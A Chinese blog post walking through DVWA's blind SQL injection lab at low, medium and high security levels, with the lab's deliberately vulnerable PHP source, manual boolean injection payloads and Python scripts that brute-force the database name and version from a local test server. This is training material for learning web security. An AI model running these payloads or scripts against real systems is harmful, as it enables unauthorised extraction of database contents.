DVWA SQL BLiND

最新推荐文章于 2025-06-06 21:25:47 发布
原创 最新推荐文章于 2025-06-06 21:25:47 发布
· 657 阅读 · 0 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #mysql

前置知识:

        1.通过and来判断payload是否正确

        2.length():返回字符串长度

        3.(23条消息) sql: substr函数用法_MaggieChenn的博客-优快云博客_sql substr函数 从右往左

        4.ASCII() 函数返回特定字符的 ASCII 值 

LOW:

        writeup:

        查看源码,发现只返回exist和missing


<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    mysql_close();
}

?>

        尝试1' and length(database())=4#判断库长度,成功

         尝试1' and ascii(substr(database(),1,1))>31#,正确

        尝试1' and ascii(substr(database(),1,1))<126#,正确

        尝试1' and ascii(substr(database(),1,1))>78#,正确

        尝试1' and ascii(substr(database(),1,1))<102#,正确

        尝试1' and ascii(substr(database(),1,1))>90#,正确

        尝试1' and ascii(substr(database(),1,1))>96#,正确

        尝试1' and ascii(substr(database(),1,1))>99#,正确

        尝试1' and ascii(substr(database(),1,1))>101#,错误

        尝试1' and ascii(substr(database(),1,1))=100#,正确,得出第一个字母为d

        尝试用脚本来获取库名

import requests

url="http://192.168.3.52/vulnerabilities/sqli_blind"
headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70"}
cookies={"security":"low","PHPSESSID":"594uitfe60ga46vmoop7la4dj7"}
flag='User ID exists in the database'
for i in range(1,5):
	for c in range(65,122):
		payload="1' and ascii(substr(database(),"+str(i)+",1))="+str(c)+"#"
		param={
		"id":payload,
		"Submit":"Submit",
		}
		response = requests.get(url, params = param, headers = headers, cookies = cookies)
		if response.text.find(flag)!=-1:
			print(chr(c),end="")

        同理可以获得数据库版本

Medium:

        writeup:

        查看源码,发现是整型闭合

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = mysql_real_escape_string( $id );

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    //mysql_close();
}

?>

        这里采用抓包爆破,方法同LOW级别,爆破应选pitchfork,payload1,2同脚本的穷举一样。爆破结果确实为23个字符,解码后结果为:5.5.47-0ubuntu0.14.04.1

 

 

 High:

        同上测试后发现是单引号闭合,且cookies相比low有变化

        尝试脚本,成功

import requests

url="http://192.168.3.52/vulnerabilities/sqli_blind"
headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.78"}
flag="User ID exists in the database"
for i in range(1,24):
	for c in range(33,126):
		cookies={"security":"high","PHPSESSID":"2d0bkdkrqt9u5uk7b3tks70mo0","id":"1'+and+ascii(substr(version(),"+str(i)+",1))="+str(c)+"#"}
		payload="1' and ascii(substr(version(),"+str(i)+",1))="+str(c)+"#"
		param={
		"id":payload,
		"Submit":"Submit",
		}
		response = requests.get(url, params = param, headers = headers, cookies = cookies)
		if response.text.find(flag)!=-1:
			print(chr(c))
			break

         最后查看源码,发现错误的尝试会使代码执行时间变长,出现404,这也难怪等结果的时间很久

<?php

if( isset( $_COOKIE[ 'id' ] ) ) {
    // Get input
    $id = $_COOKIE[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Might sleep a random amount
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }

        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    mysql_close();
}

?>
基于dvwasql盲注(Blind)-低中高
滕财然的博客
11-15 3121
目录sql盲注和sql注入的区别sql盲注过程dvwa-SQL Injection (Blind) low级别布尔盲注时间盲注dvwa-SQL Injection (Blind) Medium级别dvwa-SQL Injection (Blind) High级别 sql盲注和sql注入的区别 盲注:目标只会回复是或不是,没有详细内容 注入:可以查看到详细内容 盲注分为:布尔盲注、时间盲注...
网络安全 DVWA通关指南 DVWA SQL Injection (Blind SQL盲注)
YueXuan_521的博客
09-14 2016
这篇文章是关于网络安全DVWA(Damn Vulnerable Web Application)的SQL注入挑战指南,主要介绍了Low、Medium、High和Impossible四个安全级别的SQL盲注攻击方法。Low级别通过直接构造SQL语句获取数据库信息;Medium级别使用ASCII码值绕过单引号转义;High级别使用布尔盲注和Cookie传参,并有限制查询结果;Impossible级别通过参数化查询和CSRF令牌防御SQL注入。文章详细展示了攻击步骤和防御措施,帮助读者理解
DVWA-SQL Injection (Blind)
05-28 1634
其实做完之后可以发现基于布尔的盲注根据页面返回信息猜解数据库信息,而基于时间的盲注没有页面返回信息,它是通过页面response时间来猜解数据库信息,就是把布尔的payload主要部分放在了if函数的第一位(条件表达式),转移到sleep或者1之后根据页面response判断表达式的真假,从而猜解数据库信息。
SQL注入之Blind注入攻击(dvwa)笔记
qq_73799667的博客
01-28 709
SQL注入(Blind)是一种常见的安全漏洞,它允许攻击者向应用程序的数据库中执行恶意的SQL查询 在传统的SQL注入攻击中,攻击者可以直接获取到应用程序返回的数据库错误信息或查询结果,从而了解到他们所注入的恶意SQL语句是否生效
DVWA——SQL注入+盲注
qq_58553228的博客
06-02 2305
目的:执行特定sql语句,获得其他相关内容。攻击方式:动态构造SQL语句影响:数据库的脱裤、修改、甚至影响到操作系统。
DVWA靶场第九关:SQL注⼊(盲注)(SQL Injection (Blind))
weixin_55270891的博客
02-20 745
抓包将参数id改为1’ and length(database())=4 #,显示存在,说明数据库名的⻓度为4个字。然后猜解数据库名:输⼊1’ and length(database())=4 #,显示存在:说明⻓度为4。SQL盲注与⼀般注⼊的区别在于⼀般的注⼊攻击者可以直接从⻚⾯上看到注⼊语句的执⾏结果,⽽盲注。可以看到,High级别的代码利⽤cookie传递参数id,当SQL查询结果为空时,会执⾏函数。输⼊1 and 1 =1 和1 and 1 = 2均显示存在。可以通过过抓包来实现sql盲注。
DVWASQL(盲注)
Hacker_feng的博客
09-29 921
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
DVWAsql注入-盲注SQL Injection (Blind)
qq_54537919的博客
06-25 1640
DVWAsql注入-盲注SQL Injection (Blind)
DVWA------SQL Injection (Blind)(SQL盲注)
m0_65712192的博客
12-09 3768
DVWA------SQL Injection (Blind)(SQL盲注)
【渗透测试】 sqlmap工具注入-基于dvwasql injection_dvwa sql注入 sqlmap
2401_84968269的博客
05-13 1235
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
DVWA靶场-SQL Injection (Blind)SQL注入盲注
mlws1900的博客
03-19 1743
直接使用报错:' union select 1,count(*),concat('/',(select @@datadir),'/',floor(rand(0)*2))a from information_schema.columns group by a--+盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。length:正整数,指定将从左边返回的字符数。
DVWA靶场SQL注入
Tangyoo的博客
07-03 1523
SQL注入是指攻击者通过在Web表单输入字段、URL参数、HTTP头部等位置插入恶意的SQL代码,从而欺骗服务器执行非法的数据库操作。
MYSQL 高级 SQL 技巧
_binlong的博客
06-03 481
这些高级技巧可以根据实际需求灵活组合使用,以解决复杂的 SQL 查询和数据处理问题。以下是一些高级 SQL 技巧,可以帮助优化查询、提高性能并解决复杂的数据处理问题。窗口函数允许在查询结果的行上进行计算,而不会减少行数。动态 SQL 允许在运行时构建和执行 SQL 语句,适用于灵活的查询需求。现代数据库支持 JSON 数据类型和相关函数,方便存储和查询半结构化数据。临时表和公共表表达式(CTE)可以简化复杂查询,提高可读性和性能。创建合适的索引可以显著提高查询性能,尤其是在大表上。
SQL进阶之旅 Day 18:数据分区与查询性能
在未来等你的专栏
06-06 647
数据分区是指将一个逻辑上的大表按照某种规则(如范围、列表或哈希)划分为多个物理存储单元(分区)。每个分区可以独立存储和管理,从而减少单次查询需要扫描的数据量,进而提高查询效率。范围分区(Range Partitioning):根据列值的范围划分分区。列表分区(List Partitioning):根据列值的离散集合划分分区。哈希分区(Hash Partitioning):根据哈希函数的结果划分分区。组合分区(Composite Partitioning):结合多种分区策略,如范围+哈希。
NoSQL 之Redis哨兵
最新发布
YUNYINGXIA的博客
06-06 921
在分布式系统中,Redis 作为高性能键值存储中间件,其可用性至关重要。单节点 Redis 存在单点故障风险,一旦宕机将导致缓存层失效,甚至引发级联故障。为解决这一问题,Redis 引入哨兵模式(Sentinel),通过轻量级的监控与自动故障转移机制,保障 Redis 服务的高可用性。哨兵节点协作流程主节点故障后,哨兵通过ping命令检测到主观下线,触发quorum投票机制确认客观下线。基于 Raft 算法选举领导者哨兵,确保唯一执行故障转移的节点。
SQL进阶之旅 Day 16:特定数据库引擎高级特性
在未来等你的专栏
06-05 964
今天我们学习了MySQL、PostgreSQL和Oracle的高级特性及其应用场景。这些功能不仅解决了特定场景下的技术难题,还为后续性能优化奠定了基础。下一天的内容预告:Day 17——大数据量查询优化策略。掌握MySQL JSON字段的操作方法。学会使用PostgreSQL分区表提升查询性能。理解Oracle物化视图的工作机制。能够根据业务需求选择合适的数据库高级特性。
NoSQL之Redis配置与优化
2501_91114776的博客
06-05 696
定义:关系数据库(Relational Database)是基于关系模型(Relational Model)的数据库,使用表格(表、行、列)的结构存储和管理数据。数据之间通过主键(Primary Key)和外键(Foreign Key)建立关联。特点:数据以严格的二维表形式存储,遵循预定义的模式(Schema)。使用结构化查询语言(SQL)进行数据操作和查询。
SQLAlchemy 中的 func 函数使用指南
★匆匆★的专栏
06-06 269
func是模块中的一个特殊对象,它作为 SQL 函数的命名空间使用。当你访问func的属性时,SQLAlchemy 会创建一个对应的 SQL 函数调用。# 为函数结果指定列名).all()# 定义自定义函数类# 定义编译规则return "my_random()" # 调用PostgreSQL中的自定义函数# 使用自定义函数。
数据库系统概论(十四)详细讲解SQL中空值的处理
2402_83322742的博客
06-02 1042
本文介绍了SQL中空值(NULL)的处理方法。空值表示未知、不存在或无意义的数据,不能直接用"="判断,需使用"IS NULL"或"IS NOT NULL"。空值的产生包括主动插入、更新设置和外连接查询。文中强调了主键字段的非空约束,并详细讲解了空值在算术运算(结果为NULL)、比较运算(结果为UNKNOWN)和逻辑运算中的特殊处理规则。最后通过查询示例展示了如何正确筛选包含空值的数据记录。该内容为数据库查询中处理空值问题提供了实用指导。
dvwa sql injection (blind)
03-16
DVWA SQL注入(盲注)是一种攻击技术,利用应用程序中的漏洞,通过注入恶意代码来获取敏感数据或者控制应用程序。在盲注中,攻击者无法直接获取数据库中的数据,而是通过不断尝试不同的注入语句,观察应用程序的反应...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

QMDD

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值